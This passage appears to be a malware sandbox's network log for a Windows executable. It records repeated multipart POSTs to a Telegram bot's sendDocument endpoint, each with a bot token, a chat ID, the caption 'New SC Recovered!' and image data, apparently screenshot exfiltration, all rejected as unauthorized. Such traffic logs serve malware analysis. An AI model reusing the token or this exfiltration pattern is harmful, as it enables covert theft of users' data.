2024-07-25 22:01:20 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:01:20 UTC	7412	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:01:20 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 63 33 39 39 39 63 62 66 62 34 38 2d 2d 0d 0a Data Ascii: -----------------------------8dccc3999cbfb48--
2024-07-25 22:01:20 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:01:20 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49735	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:01:22 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcceb63c23233e Host: api.telegram.org Content-Length: 57551 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:01:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:01:22 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 65 62 36 33 63 32 33 32 33 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 65 62 36 33 63 32 33 32 33 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 30 36 2f 32 30 32 34 20 32 30 3a 35 35 3a 31 39 0a 55 73 65 72 Data Ascii: -----------------------------8dcceb63c23233eContent-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcceb63c23233eContent-Disposition: form-data; name="caption"New SC Recovered!Time: 09/06/2024 20:55:19User
2024-07-25 22:01:22 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:01:22 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:01:22 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:01:22 UTC	7412	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:01:22 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 65 62 36 33 63 32 33 32 33 33 65 2d 2d 0d 0a Data Ascii: -----------------------------8dcceb63c23233e--
2024-07-25 22:01:22 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:01:22 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49736	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:01:35 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcd5311bcd1988 Host: api.telegram.org Content-Length: 57551 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:01:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:01:35 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 35 33 31 31 62 63 64 31 39 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 35 33 31 31 62 63 64 31 39 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 31 35 2f 32 30 32 34 20 30 32 3a 34 30 3a 30 35 0a 55 73 65 72 Data Ascii: -----------------------------8dcd5311bcd1988Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcd5311bcd1988Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/15/2024 02:40:05User
2024-07-25 22:01:35 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:01:35 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:01:35 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:01:35 UTC	7412	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:01:35 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 35 33 31 31 62 63 64 31 39 38 38 2d 2d 0d 0a Data Ascii: -----------------------------8dcd5311bcd1988--
2024-07-25 22:01:35 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:01:35 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49737	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:01:39 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcd883f159ae3d Host: api.telegram.org Content-Length: 57551 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:01:40 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 38 38 33 66 31 35 39 61 65 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 38 38 33 66 31 35 39 61 65 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 31 39 2f 32 30 32 34 20 30 38 3a 31 30 3a 33 34 0a 55 73 65 72 Data Ascii: -----------------------------8dcd883f159ae3dContent-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcd883f159ae3dContent-Disposition: form-data; name="caption"New SC Recovered!Time: 09/19/2024 08:10:34User
2024-07-25 22:01:40 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:01:40 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:01:40 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:01:40 UTC	7412	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
